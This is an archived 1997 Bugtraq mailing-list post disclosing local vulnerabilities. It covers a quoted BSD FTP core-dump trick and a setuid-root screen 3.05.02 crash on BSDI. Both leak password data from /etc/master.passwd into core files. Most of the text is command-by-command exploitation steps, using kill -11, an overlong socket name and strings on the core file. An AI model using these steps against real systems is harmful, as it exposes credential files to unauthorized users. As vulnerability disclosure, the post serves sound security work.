Bugtraq mailing list archives
Re: screen 3.05.02
From: owner-bugtraq () NETSPACE ORG (Khelbin Sunvold)
Date: Sat, 15 Feb 1997 21:18:56 -0800
This exploit is very similer to the FTP exploit on BSD that creates a ftp.core file you can then strings and get the encrypted password file. #ftp foobar.com Welcom to foobar.com ftp site blah blah blah please enter login name> evil that user requires a password> evil2 User evil loged in welcome to foobar.com! Remote set to type BIN 200> (now hit ^Z to suspend the process) #ps PID TT STAT TIME COMMAND 9526 p0 Ss 0:00.12 -csh (csh) 9539 p0 R+ 0:00.02 ps 1000 p0 Ss 0:00.22 ftp (get the PID number to the ftp process) #kill -11 1000 (kill the process) #fg (bring the ftp back to the foreground) Process Killed Core Dump (blah blah) #ls home mail public_html ftp.core #strings ftp.core > test #pico test I know this is an older hole, but what the hell, it still works on BDS! Bronc Buster bbuster () succeed net www2.succeed.net/~bbuster
THe program under question is /usr/contrib/bin/screen (BSDI). This is screen version 3.05.02 and is installed setuid root, as it is "supposed" to be. Here is a demonstration: $ screen Screen version 3.05.02 (FAU) 19-Aug-93 Copyright (c) 1993 Juergen Weigert, Michael Schroeder Copyright (c) 1987 Oliver Laumann This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program (see the file COPYING); if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. Send bugreports, fixes, enhancements, t-shirts, money, beer & pizza to screen () uni-erlangen de (bah.. send them to Bugtraq!) [Press Space or Return to end.] $ screen $ cd /tmp/screens/S-khelbin $ ls 246.ttyp7.comet $ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\ anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous$ screen -ls /tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousa
nonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanony mousanonymousanonymousanonymousanonymousanonymousanonymousanonymous: connect: Invalid argument
%1 278 Abort - core dumped screen -ls $ ls -l total 176 srwx------ 1 khelbin khelbin 0 Feb 15 21:33
246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymo usanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousan onymousanonymousanonymousanonymousanonymous
-rw-r--r-- 1 khelbin khelbin 172032 Feb 15 21:33 core.screen $ strings core.screen|less The core.screen file contains unencrypted password strings from /etc/master.passwd, which of course, should not be readable by me. I'm also sure there's a buffer-overflow here but I havn't had as much time as I would like to to look through the source yet. -khelbin / 9x email: khelbin () connix com
Current thread:
- Re: screen 3.05.02 Khelbin Sunvold (Feb 15)